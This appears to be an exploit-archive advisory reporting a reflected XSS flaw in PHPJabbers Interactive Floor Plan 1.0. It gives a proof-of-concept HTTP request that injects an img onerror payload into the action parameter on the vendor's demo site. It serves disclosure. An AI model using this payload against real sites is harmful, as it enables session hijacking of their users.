Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking

2024.01.28
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: Interactive-Floor-Plan-1.0-XSS-Reflected-SESSION-Hijacking ## Author: nu11secur1ty ## Date: 01/28/2024 ## Vendor: https://www.phpjabbers.com/ ## Software: https://www.phpjabbers.com/interactive-floor-plan-software/#sectionDemo ## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected ## Description: The value of the action request parameter is copied into the HTML document as plain text between tags. The payload epe7x<img src=a onerror=alert(1)>aagqb was submitted in the action parameter. This input was echoed unmodified in the application's response. The attacker can steal session cookies etc. STATUS: HIGH - Vulnerability [+]Exploit: ```GET GET /1706426767_110/index.php?controller=pjFront&action=pjActionLoadCssepe7x%3cimg%20src%3da%20onerror%3dalert(1)%3eaagqb HTTP/1.1 Host: demo.phpjabbers.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: _ga=GA1.2.809339229.1706427310; _gid=GA1.2.1556395590.1706427310; _gat=1; _fbp=fb.1.1706427309936.1280956215; _ga_NME5VTTGTT=GS1.2.1706427311.1.0.1706427311.60.0.0 Upgrade-Insecure-Requests: 1 Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="121", "Chromium";v="121" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2024/Interactive-Floor-Plan-1.0) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/01/interactive-floor-plan-10-xss-reflected.html) ## Time spent: 00:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top